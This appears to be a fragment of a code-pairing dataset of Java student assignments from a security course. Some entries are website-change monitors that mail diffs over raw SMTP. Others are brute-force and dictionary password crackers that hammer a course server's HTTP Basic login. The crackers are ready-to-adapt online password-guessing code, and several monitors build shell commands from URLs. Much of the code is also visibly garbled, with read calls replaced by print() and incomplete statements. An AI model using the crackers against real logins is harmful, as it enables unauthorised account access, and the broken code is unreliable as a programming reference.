);\n\t\tout.flush();\n\t\tout.print();\n\t\tout=null;\n\n\t\tmsg=msg+DiffPrint.getDiff(tempfile1,tempfile2,tempfile3);\n\
\t\tString data=\"\";\n\t\ttry{\n\t\t\tFileReader fin=new FileReader(tempfile3);\n\
\t\t\tint ch=fin.print();\n\t\t\twhile(ch!= -1)\n\t\t\t{\n\t\t\t data=data+\"\
\"+(char)ch;\n\t\t\t\t ch=fin.print();\n\t\t\t}\n\t\t}\n\t\tcatch(FileNotFoundException\
\ m){}\n\n\t\tmsg=msg+data;\n\n\t\ttemp1=in1.readLine();\n\n\t\tint numImg=Integer.parseInt(temp1);\n\
\t\tif(numImg != images.length)\n\t\t\tmsg=msg+\"The number of images has chnaged.\\\
n The number of images before was \"+numImg+\" \\n While the number of images\
\ found now is \"+images.length+\" .\\n\";\n\t\telse\n\t\t\tmsg=msg+\" is change\
\ in the number of images the .\\n\";\n\n\t\tString iText1=\"\",iText2=\"\";\n\
\t\t\n\t\tfor(int i=0;i<numImg;i++)\n\t\t{\n\t\t\tout=new PrintWriter(new FileOutputStream(tempfile1));\n\
\t\t\tout.println(images[i]);\n\t\t\tout.flush();\n\t\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
);\n\t\t\tout.flush();\n\t\t\tout.print();\n\t\t\tout=null;\n\n\t\t\tin2=new BufferedReader(new\
\ FileReader(tempfile1));\n\t\n\t\t\twhile (temp1.equals(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
+\"\\n\")==false)\n\t\t\t{\n\t\t\t\n\t\t\t\ttemp1=in1.readLine();\n\t\t\t\ttemp1=temp1+\"\
\\n\";\n\t\t\t\ttemp2=in2.readLine();\n\t\t\t\ttemp2=temp2+\"\\n\";\n\t\t\t\t\
iText1=iText1+temp1;\n\t\t\t\tiText2=iText2+temp2;\n\t\t\t}\n\t\t\t\n\t\t\tin2.print();\n\
\t\t\tin2=null;\n\n\t\t\tif(iText1.equals(iText2))\n\t\t\t\tmsg=msg+\" is change\
\ in the Image number \"+(i+1)+\". \\n\";\n\t\t\telse\n\t\t\t\tmsg=msg+\"The Image\
\ number \"+(i+1)+\" has changed. \\n\";\n\t\t}\n\n\t\treturn msg;\n\t}\n\tprivate\
\ String[] getImages(String text) throws IOException\n\t{\n\t\tString [] images,urls;\n\
\t\tjava.util.ArrayList alist=new java.util.ArrayList();\n\t\tString t=\"\";\n\
\t\tboolean img=false;\n\t\tint len=text.length();\n\t\tchar ch,last=' ';\n\t\t\
int c=0;\n\t\twhile(c<len)\n\t\t{\n\t\t\tch=text.charAt(c);\n\t\t\tif(ch=='<')\n\
\t\t\t{\n\t\t\t\tlast='<';\n\t\t\t\tt=\"\";\n\t\t\t}\n\t\t\tif(last=='<')\n\t\t\
\t{\n\t\t\t\tt=\"\"+ch;\n\t\t\t\tif(c+2 < len)\n\t\t\t\t\tt=t+text.charAt(c+1)+\"\
\"+text.charAt(c+2);\n\t\t\t\tif(t.equalsIgnoreCase(\"img\"))\n\t\t\t\t\timg=true;\n\
\t\t\t}\n\t\t\tif(img==true)\n\t\t\t\tt=+ch;\n\t\t\tif(ch=='>')\n\t\t\t{\n\t\t\
\t\tlast='>';\n\t\t\t\tif(img==true)\n\t\t\t\t{\n\t\t\t\t\t\n\t\t\t\t\tSystem.out.println();\n\
\t\t\t\t\tint n=0;\n\t\t\t\t\tchar tch,tlast=' ';\n\t\t\t\t\tString imgPath=\"\
\",tn=\"\";\n\t\t\t\t\tboolean src=false;\n\t\t\t\t\twhile(n<t.length())\n\t\t\
\t\t\t{\n\t\t\t\t\t\ttch=t.charAt(n);\n\t\t\t\t\t\ttn=\"\"+tch;\n\t\t\t\t\t\t\
if(src==false && tn.equalsIgnoreCase(\"s\") && (n+2)<t.length())\n\t\t\t\t\t\t\
{\n\t\t\t\t\t\t\ttn=tn+t.charAt(n+1)+\"\"+t.charAt(n+2);\n\t\t\t\t\t\t\tif(tn.equalsIgnoreCase(\"\
src\"))\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tsrc=true;\n\t\t\t\t\t\t\t\tn+=2;\n\t\
\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\telse if(src==true)\n\t\t\t\t\t\t{\n\t\
\t\t\t\t\t\tif(tch!='\"')\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif(tch==' ' && imgPath.indexOf('.')!=\
\ -1)\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tn=t.length();\n\t\t\t\t\t\t\t\telse if(tch=='\
\ ' || tch=='=')\n\t\t\t\t\t\t\t\t\t;\n\t\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\t\t\
imgPath=imgPath+tch;\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\
\t\tn++;\n\t\t\t\t\t}\n\t\t\t\t\talist.add(imgPath);\n\t\t\t\t}\n\t\t\t\timg=false;\n\
\t\t\n\t\t\t}\n\t\t\tc++;\n\t\t}\n\t\turls=(String[])alist.toArray(new String[0]);\
\ \n\t\timages=new String[urls.length];\n\t\tfor(int i=0;i<urls.length;i++)\n\t\
\t{\n\t\t\tSystem.out.println(urls[i]);\n\t\t\tif(urls[i].startsWith(\"http\"\
)==false && urls[i].startsWith(\"HTTP\")==false && urls[i].startsWith(\"/\")==false)\n\
\t\t\t{\n\t\t\t\ttry\n\t\t\t\t{\n\t\t\t\t\timages[i]=getResource(baseURL+\"/\"\
+urls[i]);\t\t\t\n\t\t\t\t}\n\t\t\t\tcatch(FileNotFoundException fnfe)\n\t\t\t\
\t{\n\t\t\t\t\tString f=baseURL+\"/\"+urls[i];\n\t\t\t\t\timages[i]=f.substring(0,f.lastIndexOf('/'));\n\
\t\t\t\t}\n\t\t\t}\n\t\t\telse if(urls[i].startsWith(\"http\")==false && urls[i].startsWith(\"\
HTTP\")==false)\t\n\t\t\t{\n\t\t\t\ttry\n\t\t\t\t{\n\t\t\t\t\timages[i]=getResource(baseURL+urls[i]);\n\
\t\t\t\t}\n\t\t\t\tcatch(FileNotFoundException fnfe)\n\t\t\t\t{\n\t\t\t\t\tString\
\ f=baseURL+urls[i];\n\t\t\t\t\timages[i]=f.substring(0,f.lastIndexOf('/'));\n\
\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\ttry\n\t\t\t\t{\n\t\t\t\t\timages[i]=getResource(urls[i]);\n\
\t\t\t\t}\n\t\t\t\tcatch(FileNotFoundException fnfe)\n\t\t\t\t{\n\t\t\t\t\timages[i]=urls[i].substring(0,urls[i].lastIndexOf('/'));\n\
\t\t\t\t}\n\n\t\t\t}\n\n\t\t}\n\t\treturn images;\n\t}\n\tprivate void log(String\
\ pageText,String[] images) throws IOException\n {\n\t\tPrintWriter out=new\
\ PrintWriter(new FileOutputStream(file));\n\t\tout.println(pageText);\n\t\tout.flush();\n\
\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\");\n\t\tout.flush();\t\
\n\n\t\tif(images.length>0)\n\t\t{\n\t\t\tout.println(images.length+\"\");\n\t\
\t\tout.flush();\t\n\t\t}\n\t\tfor(int i=0;i<images.length;i++)\n\t\t{\n\t\t\t\
out.println(images[i]);\n\t\t\tout.flush();\n\t\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
);\n\t\t\tout.flush();\t\t\n\t\t}\t\n\n\t}\n\n public String getResource(String\
\ url) throws IOException\n\t{\n\t\t\t\tSystem.out.println(\"url=\"+url);\n\t\t\
\t\tString urlData=new String(\"\");\n InputStreamReader in=new\
\ InputStreamReader(new URL(url).openStream());\n int ch=in.print();\n\
\ while(ch!= -1)\n {\n urlData=urlData+(char)ch;\n\
\ ch=in.print();\n }\n\t\treturn urlData;\n\t\
}\n\n public boolean mail (String msg) throws IOException\n {\n\
\ boolean ret=true;\n try\n {\n \
\ Socket csoc=new Socket(\"yallara.cs.rmit.edu.\",25);\n BufferedReader\
\ in=new BufferedReader(new InputStreamReader(csoc.getInputStream()));\n \
\ PrintWriter out=new PrintWriter(csoc.getOutputStream(),true);\n \
\ out.println(\"HELO \"+host);\n System.out.println(in.readLine());\n\
\ out.println(\"MAIL FROM:\"+from);\n System.out.println(in.readLine());\n\
\ out.println(\"RCPT :\");\n System.out.println(in.readLine());\n\
\ out.println(\"DATA\");\n System.out.println(in.readLine());\n\
\ out.println(\"SUBJECT:\"+subject);\n System.out.println(in.readLine());\n\
\ out.println(msg);\n \t out.println(\".\");\n \
\ System.out.println(in.readLine());\n out.println(\"QUIT\");\n \
\ System.out.println(in.readLine());\n }\n catch(Exception\
\ e)\n {\n e.printStackTrace();\n System.out.println(\"\
Some error occoured while communicating server\");\n ret=false;\n\
\ \t return ret;\n }\n\t System.out.println(\"**************************************\\\
nMAIL ->\"+msg);\n return ret;\n }\n\n\tpublic static void main\
\ (String[] args)\n\t{\n\t\tSystem.out.println(\"Usage : \\n java WatchDog <space\
\ seperated list of urls> <current path> [First] \\n {The First at the end is\
\ used when running the watch dog for a new URL for the first Time}\");\n\t\t\
boolean flag=false;\n\t\tint num=args.length-1;\n\t\tif(args[args.length-1].equalsIgnoreCase(\"\
First\"))\n\t\t{\n\t\t\tnum--;;\n\t\t\tflag=true;\n\t\t}\nSystem.out.println(args[num]);\n\
\n\t\tWatchDog w=new WatchDog(flag);\n\t\tString []u=new String[num];\n\t\tfor(int\
\ i=0;i<u.length;i++)\n\t\t\tu[i]=args[i];\n\t\tw.startWatching(u,args[num]);\n\
\t}\n}\n"
- source_sentence: "import java.net.*;\nimport java.io.*;\nimport java.util.*;\nimport\
\ java.text.*;\n\n\n\n\npublic class WatchDog{\n \n \n \n \n \n public\
\ static void main (String[] args) throws InterruptedException, IOException{\n\
\n \n String urlString = \"http://www.cs.rmit.edu./students/\";\n \n\
\ \n String mesg = \"\";\n \n boolean flag = false;\n \n InputStream\
\ rtemp;\n \n if (args.length == 2) {\n \t\n \tSystem.err.println\
\ (\n \t\t\n \t\t\"Usage : java BruteForce <Host> <Mailhost> <Sending\
\ E-mail>\");\n \treturn;\n \t\n }\n \n \n \n BufferedReader\
\ rnew;\n \n BufferedReader rold = ReadFile (urlString);\n \n SaveFile(\"\
weblog\",urlString); \n \n Date lasttime = CheckTime(urlString);\n \n\
\ \n Date newtime = new Date();\n \n int i = 0; \n \n System.out.println(\"\
......\"); \n \n \n while (true) {\n \t\n \t \t\n \tnewtime\
\ = CheckTime(urlString);\n \t\n \tSystem.out.println (\"Checking \"+ new\
\ Date());\n \t\n \tif (newtime.toString().equals(lasttime.toString())==false)\
\ {\n \t\t\n \t\n \t rnew = ReadFile (urlString);\n \t \t\n\
\ \t\t \t\t\n \t\tmesg = CompareFile(rold,rnew);\n \t\t\n \t\t\
\n \t\tSaveFile(\"weblog\",urlString);\n \t\t\n \t\t\n \t\trold\
\ = OpenFile (\"weblog\");\n \t\t\n \t\t\n \t\tlasttime=newtime;\n \t\
\t\n \t System.out.println(\"Sending message\");\n \t \n \t \
\ SendMail(trimtag(mesg),args[0],args[1],args[2]); \n \t \n \t System.out.println(trimtag(mesg));\n\
\ \t\n \t\n \t} \n \t\n \tThread.sleep (24*3600*1000); \n \t\
}\n \n \n \n }\n\n \n \n private static BufferedReader ReadFile\
\ (String urlString) throws IOException{\n \t\n \t \
\ \n \n URL url = new URL (urlString);\n\n \n HttpURLConnection\
\ uc = (HttpURLConnection) url.openConnection();\n \n \n \
\ InputStream in = (InputStream) uc.getInputStream();\n \n BufferedReader\
\ r = new BufferedReader (new InputStreamReader (in));\n \n \n \
\ \n return r;\n \n \n }\n\n \n\n private static BufferedReader\
\ OpenFile (String FileName) throws IOException{\n \t\n FileInputStream\
\ in = new FileInputStream (FileName);\n \n InputStreamReader is=\
\ new InputStreamReader (in); \t \n \n BufferedReader\
\ r = new BufferedReader (is);\n \n \n return r;\n \n\
\ \n \n \n }\n\n\n \n \nprivate static void SaveFile (String\
\ FileName, String urlstring) throws IOException{\n \t\n \t \n \tString\
\ cmd = \"wget -q \"+urlstring+\" -O \"+ FileName ;\n \t\n \t\n \tRuntime.getRuntime().exec(cmd);\
\ \n \t \n }\n\n \n \n \n \n private static Date CheckTime (String\
\ urlString) throws IOException {\n \t\n \t URL url = new URL (urlString);\n\
\n \n HttpURLConnection uc = (HttpURLConnection) url.openConnection();\n\
\ \n uc.setRequestMethod (\"HEAD\");\n \n return (new\
\ Date (uc.getLastModified()));\n \n \n \n } \n\
\ \n \n \n private static String CompareFile (BufferedReader inold, BufferedReader\
\ innew) throws IOException{\n \t\n \t\n \t\n \t Vector newF= new Vector\
\ ();\n Vector oldF= new Vector ();\n\n\n int old_count=0;\n\t \t\
int new_count=0;\n\n\t \tString line=\"\";\n\n StringBuffer mesg = new\
\ StringBuffer (\"NEW CONTENT : \\n\");\n\n\t \tint j;\n \n \n \
\ \n\t while ((line=inold.readLine())!= null){\n\n\t \t\t if (line.trim().length()!=0){\n\
\t \t\t oldF.addElement(line);\n\t \t\t \n\t \t\n\t \t\t \n\t \t\t }\n\n\t \t\
\t }\n\n\t \twhile ((line=innew.readLine()) != null){\n\t \t\t if (line.trim().length()!=0){\n\
\t \t\t newF.addElement(line);\n\t }\n\n\t \t\t }\n\n\t \tfor (int i=0;\
\ i<newF.size();i++){\n\n\t \t\t j=0;\n\n\t \t\t while (((String)newF.elementAt(i)).equals((String)oldF.elementAt(j))==false){\n\
\n\t \t\t \tj++;\n \n if (j==oldF.size()) \n \
\ { j--;\n \tbreak;\n }\n\t \t\t\
\ \t}\n\n \n \n\t \t\t if (((String)newF.elementAt(i)).equals((String)oldF.elementAt(j))){\n\
\n newF.removeElementAt(i);\n\t \t i--;\n\t \t \
\ oldF.removeElementAt(j);\n\n\n\t \t\t \t}\n\n\t \t \t}\n\n\n\n\t \tfor (int\
\ i=0; i<newF.size();i++){\n\n\t \t mesg.append((String)(newF.elementAt(i)));\n\
\t \t mesg.append(\"\\n\");\n }\n\n\n\t mesg.append(\"OLD CONTENT:\
\ \\n\");\n\n for (int i=0; i<oldF.size();i++){\n\n mesg.append((String)oldF.elementAt(i));\n\
\ mesg.append(\"\\n\");\n \n\t \t}\n\n \n\n\n\t return mesg.toString();\n\
\n\n\n\t \n\n\n}\n\n\n\nprivate static void SendMail (String mesg, \n \
\ String host,String mailhost, String sending ) throws IOException {\n\t\n \
\ String send_cmd = \"\";\n\n\ttry {\n\t\t\n\t\tSocket s = new Socket (host,\
\ 25);\n\t\t\n\t PrintStream os = new PrintStream (s.getOutputStream());\n\t\
\ \n send_cmd = \"HELO \" + mailhost;\n \n os.print(send_cmd\
\ + \"\\r\\n\");\n \n send_cmd = \"MAIL From : website@cs.rmit.edu.\"\
;\n \n os.print(send_cmd + \"\\r\\n\");\n \n send_cmd\
\ = \"RCPT : \" + sending;\n \n os.print(send_cmd + \"\\r\\n\"\
);\n \n send_cmd = \"DATA\";\n \n os.print(send_cmd\
\ + \"\\r\\n\");\n \n send_cmd = (\"Subject: Website Change Notice\"\
);\n \n os.print(send_cmd + \"\\r\\n\");\n \n os.print(\"\
\\r\\n\");\n \n os.print(mesg+\"\\r\\r\\n\");\n \n \
\ os.print(\".\\r\\n\");\n \n os.print(\"QUIT\");\n \n \
\ \t\n\t} catch (IOException e) {\n\t\tSystem.out.println(e);\n\t}\n\t\n\n\t\n\
\ }\n\n\nprivate static String trimtag (String mesg){\n\t\n\tString[] taglist\
\ = {\"<a\", \"<A\", \"<applet \", \"<APPLET\", \"<img \", \"<IMG \"}; \n\t\n\t\
String subst = \"\";\n\t\n\tStringBuffer tempst= new StringBuffer();\n\tint j\
\ = 0;\n\t\n\tint i = 0;\n\t\n\tint m = 0;\n\t\n\t\n\twhile (mesg.length()!=0)\
\ {\n\t \n\t m=0;\n\t \n\t i = mesg.indexOf(\"<\");\n\t \n\t \n\t\
\ if (i!=-1) {\n\t \n\t tempst.append(mesg.substring(0,i));\n\t \
\ \n\t \t\n\t } \n\t else { \t\n\t tempst.append(mesg.substring(0));\n\
\t break;\n }\n\t \n\t \n\t j = mesg.indexOf(\">\"); \n\t\n\t \
\ \n\t subst=mesg.substring(i,j+1); \n\t \n\t while (subst.startsWith(taglist[m])==false)\
\ {\n\t \t\n\t \tm++;\n\t \t\n\t \tif (m==taglist.length) \n\t \t\n\t\
\ \t{ m--;\n\t \t\tbreak;\n\t }\n\t \t\n\t \t}\t\n\t \n\t if\
\ (subst.startsWith(taglist[m])) tempst.append (subst);\n\t \n\t \n\t mesg\
\ = mesg.substring(j+1);\n\t \n\t \n\t }\n\t\n\t return tempst.toString();\n\
\t \n\t}\n\n\n\n\n} "
sentences:
- "\n\n\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\n\npublic class\
\ Dictionary\n{\n\n static BufferedReader in = null;\n static MyAuthenticator\
\ Auth = new MyAuthenticator();\n\n \n public static void main(String[] args)\
\ throws IOException\n {\n int tmp = 0;\n String str =\"\";\n \
\ Authenticator.setDefault(Auth);\n \n try\n {\n URL url =\
\ new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\");\n\n \n \
\ \n while(tmp!=1)\n {\n try\n {\n\
\ in = new BufferedReader(new InputStreamReader(url.openStream()));\n\
\ tmp=1;\n }\n catch (IOException e) {}\n\
\ \n } \n\n while ((str = in.readLine()) !=\
\ null) \n {\n \n \n \n }\n \
\ \n\n System.out.println(\"The successful Password found using\
\ a Dictionary search is = \" + Auth.finalPass());\n\n } \n catch (MalformedURLException\
\ e) \n {System.out.println(\"mfURL\");}\n } \n\n\n}\n\nclass MyAuthenticator\
\ extends Authenticator \n{\n String username = \"\";\n static String password\
\ = \"\";\n \n static String DictFile = \"/usr/share/lib/dict/words\";\n \
\ static BufferedReader fReader;\n\n public MyAuthenticator()\n {\n \
\ try\n {\n fReader = new BufferedReader\n \
\ (new FileReader(DictFile));\n }\n catch (FileNotFoundException\
\ e)\n {\n System.out.println(\"File \" +DictFile+ \" Not Found\"\
);\n System.out.println(\" File Opened\");\n System.exit(1);\n\
\ }\n catch (IOException e)\n {\n System.out.println(\"\
File Failed..\");\n System.exit(1);\n }\n\n }\n\n static void\
\ setPass(String pswd)\n {\n password = pswd;\n }\n\n static String\
\ finalPass()\n {\n return password;\n }\n\n static String getPass()\n\
\ {\n try\n {\n if ((password = fReader.readLine()) == null)\n\
\ {\n System.out.println(\"Password Not found in file '\" +\
\ DictFile +\"'.\");\n System.exit(1);\n }\n }\n \
\ catch (IOException ioe)\n {\n System.out.println(\"File IOException\"\
);\n System.out.println(ioe);\n }\n\n return password;\n }\n\
\n\n\n protected PasswordAuthentication getPasswordAuthentication() \n { \n\
\ \n return new PasswordAuthentication(username, getPass().toCharArray());\
\ \n\n } \n}\n"
- "\nimport java.util.*;\n\npublic class CrackThread implements Runnable {\n\n \
\ private String strUsername;\n private String strURL;\n private int iSeed;\n\
\ private int iEnd;\n \n \n public CrackThread() {\n }\n \n\
\ public void setParams(String url, String username, int seed, int end) {\n\
\ strUsername = username;\n strURL = url;\n iSeed = seed;\n\
\ iEnd = end;\n }\n \n public void run() {\n Date dtStart,\
\ dtEnd;\n PasswordGen pwd = new PasswordGen();\n PasswordTest tester;\n\
\ int i=1;\n boolean bDone = false;\n Result res;\n\n \
\ dtStart = new Date();\n \n \n pwd.setSeed(iSeed);\n\
\ \n while(!bDone) {\n tester = new PasswordTest(strURL,\
\ strUsername, pwd.getNextPassword());\n \n bDone = tester;\n\
\ i++;\n \n \n if(i % 100 == 0)\n\
\ {\n System.out.println(pwd.getPassword());\n \
\ }\n \n if(bDone) {\n \n \
\ res = new Result(strURL, strUsername, pwd.getPassword(), dtStart, new\
\ Date(), i);\n System.out.print(res.toString());\n \
\ }\n else\n {\n \n }\n \
\ \n \n if( i >= iEnd) bDone = true;\n } \
\ \n }\n \n}\n"
- "\n\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.io.*;\nimport java.net.*;\n\
\npublic class Dictionary extends Frame implements ActionListener {\n\n private\
\ TextField tf = new TextField();\n private TextArea ta = new TextArea();\n\n\
\ public void actionPerformed (ActionEvent e) {\n\t String s = tf.getText();\n\
\t String login=\"\";\n try{\n\t BufferedReader bufr = new BufferedReader\n\
\t\t\t(new FileReader (\"words1.txt\"));\n\t String inputLine=\"\";\n\n\n\n\t\
\ if (s.length() != 0)\n {\n\t\t inputLine = bufr.readLine();\n\t\t while\
\ ((inputLine != null) && (inputLine.length() != 3))\n\t\t {\n\t\t\t \n\t\t\t\
\ inputLine = bufr.readLine();\n\t\t }\n\n login=\":\"+inputLine;\n\
\t\t ta.setText (fetchURL (s,login));\n\t\t System.out.println(\"runing\"\
+login);\n\t }while(ta.getText().compareTo(\"Invalid URL\")!=0 || ta.getText().compareTo(\"\
Error URL\")!=0);\n\n\t System.out.println(\"The password is: \"+inputLine);\n\
}\ncatch(Exception ex){}\n\n }\n\n public Dictionary() {\n\n super (\"URL11\
\ Password\");\n\n \n add (tf, BorderLayout.LEFT);\n ta.setEditable(false);\n\
\ add (ta, BorderLayout.CENTER);\n tf.addActionListener (this);\n \
\ addWindowListener (new WindowAdapter() {\n public void windowClosing (WindowEvent\
\ e) {\n dispose();\n System.exit(0);\n }\n });\n \
\ }\n\n private String fetchURL (String urlString,String login) {\n StringWriter\
\ sw = new StringWriter();\n PrintWriter pw = new PrintWriter();\n\n try\
\ {\n URL url = new URL (urlString);\n\n \n MyAuthenticator =\
\ new MyAuthenticator();\n \n\n \n String encoding = new url.misc.BASE64Encoder().encode\
\ (login.getBytes());\n\n \n \n\n \n URLConnection uc =\
\ url.openConnection();\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n InputStream content = (InputStream)uc.getInputStream();\n\
\ BufferedReader in =\n new BufferedReader (new InputStreamReader\
\ (content));\n String line;\n while ((line = in.readLine()) != null)\
\ {\n pw.println (line);\n }\n } catch (MalformedURLException\
\ e) {\n pw.println (\"Invalid URL\");\n } catch (IOException e) {\n\
\ pw.println (\"Error URL\");\n }\n return sw.toString();\n }\n\
\n\n public static void main (String args[]) {\n Frame f = new Dictionary();\n\
\ f.setSize(300, 300);\n f.setVisible (true);\n }\n\n class MyAuthenticator\
\ {\n String getPasswordAuthentication(Frame f, String prompt) {\n final\
\ Dialog jd = new Dialog (f, \"Enter password\", true);\n jd.setLayout (new\
\ GridLayout (0, 1));\n Label jl = new Label (prompt);\n jd.add (jl);\n\
\ TextField username = new TextField();\n username.setBackground (Color.lightGray);\n\
\ jd.add (username);\n TextField password = new TextField();\n \
\ password.setEchoChar ('*');\n password.setBackground (Color.lightGray);\n\
\ jd.add (password);\n Button jb = new Button (\"OK\");\n jd.add\
\ (jb);\n jb.addActionListener (new ActionListener() {\n public\
\ void actionPerformed (ActionEvent e) {\n jd.dispose();\n }\n\
\ });\n jd.pack();\n jd.setVisible(true);\n return username.getText()\
\ + \":\" + password.getText();\n\n }\n }\n\n}\n \n\n class Base64Converter\n\
\ \n \n {\n\n public static final char [ ] alphabet = {\n\
\ 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L',\
\ 'M', 'N', 'O', 'P', \n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n\
\ 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', \n 'g', 'h', 'i', 'j',\
\ 'k', 'l', 'm', 'n', \n 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', \n\
\ 'w', 'x', 'y', 'z', '0', '1', '2', '3', \n '4', '5', '6', '7',\
\ '8', '9', '+', '/' }; \n\n \n \n\n public static String encode\
\ ( String s )\n \n {\n return encode ( s.getBytes ( ) );\n\
\ }\n\n public static String encode ( byte [ ] octetString )\n \
\ \n {\n int bits24;\n int bits6;\n\n char [ ] out\n\
\ = new char [ ( ( octetString.length - 1 ) / 3 + 1 ) * 4 ];\n\n \
\ int outIndex = 0;\n int i = 0;\n\n while ( ( i + 3 ) <=\
\ octetString.length )\n {\n \n bits24 = ( octetString\
\ [ i++ ] & 0xFF ) << 16;\n bits24 |= ( octetString [ i++ ] & 0xFF )\
\ << 8;\n bits24 |= ( octetString [ i++ ] & 0xFF ) << 0;\n\n \
\ bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet\
\ [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out\
\ [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0\
\ ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6\
\ = ( bits24 & 0x0000003F );\n out [ outIndex++ ] = alphabet [ bits6\
\ ];\n }\n\n if ( octetString.length - i == 2 )\n {\n \
\ \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n \
\ bits24 |= ( octetString [ i + 1 ] & 0xFF ) << 8;\n\n bits6 = ( bits24\
\ & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n\
\ bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n \
\ out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out\
\ [ outIndex++ ] = '=';\n }\n else if ( octetString.length - i ==\
\ 1 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF )\
\ << 16;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n\
\ out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out\
\ [ outIndex++ ] = '=';\n out [ outIndex++ ] = '=';\n }\n\n \
\ return new String ( out );\n }\n\n \n \n }\n\n"
- source_sentence: "\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\
\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final\
\ char [] alphabet = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n \
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z'};\n\n String pwd=\"\";\n \n for(int i=0;i<52;i++)\n\
\ {\n for(int j=0;j<52;j++)\n {\n for(int k=0;k<52;k++)\n {\n pwd = alphabet[i]+\"\
\"+alphabet[j]+\"\"+alphabet[k];\n String userPassword = \":\"+pwd;\n RealThread\
\ myTh = new RealThread(i,userPassword);\n Thread th = new Thread( myTh );\n\
\ th.start();\n try\n {\n \n \n th.sleep(100);\n }\n \
\ catch(Exception e)\n {} \n }\n }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread\
\ implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection\
\ uc =null;\n private String userPassword;\n private int responseCode = 100;\n\
\ public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n }\n catch(Exception ex1)\n {\n }\n\
\ num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n\
\ {\n\n return this.responseCode;\n }\n\n public void run()\n {\n try\n {\n\
\ String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\
\n uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty (\"\
Authorization\", \" \" + encoding);\n System.out.println(\"Reponse = \"+uc.getResponseCode()+\"\
for pwd = \"+userPassword);\n this.responseCode = uc.getResponseCode();\n \n\
\ if(uc.getResponseCode()==200)\n {\n System.out.println(\" ======= Password\
\ Found : \"+userPassword+\" ========================================= \");\n\
\ System.exit(0);\n }\n\n }\n catch (Exception e) {\n System.out.println(\"\
Could not execute Thread \"+num+\" \");\n }\n }\n\n}\n"
sentences:
- "\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic\
\ class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t\
\ = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\
\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr =\
\ t.exec(\"md5sum csfirst.html\");\n\n InputStreamReader stre\
\ = new InputStreamReader(pr.getInputStream());\n BufferedReader\
\ bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\
\t\t index = s.indexOf(' ');\n\t\t Fmd5 = s.substring(0,index);\n\t\t \
\ System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t \
\ pr = t.exec(\"wget http://www.cs.rmit.edu./students/\");\n\t\t pr = null;\n\
\t\t \n\t\t pr = t.exec(\"md5sum index.html\");\n\t\t \n\n\t\t InputStreamReader\
\ stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader\
\ bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\
\t\t index = temp1.indexOf(' ');\n\t\t Smd5 = temp1.substring(0,index);\n\
\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5\
\ == Smd5)\n\t\t System.out.println(\" changes Detected\");\n\t\t else\n\
\t\t {\n\t\t pr = t.exec(\"diff csfirst.html index.html > report.html\"\
);\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\
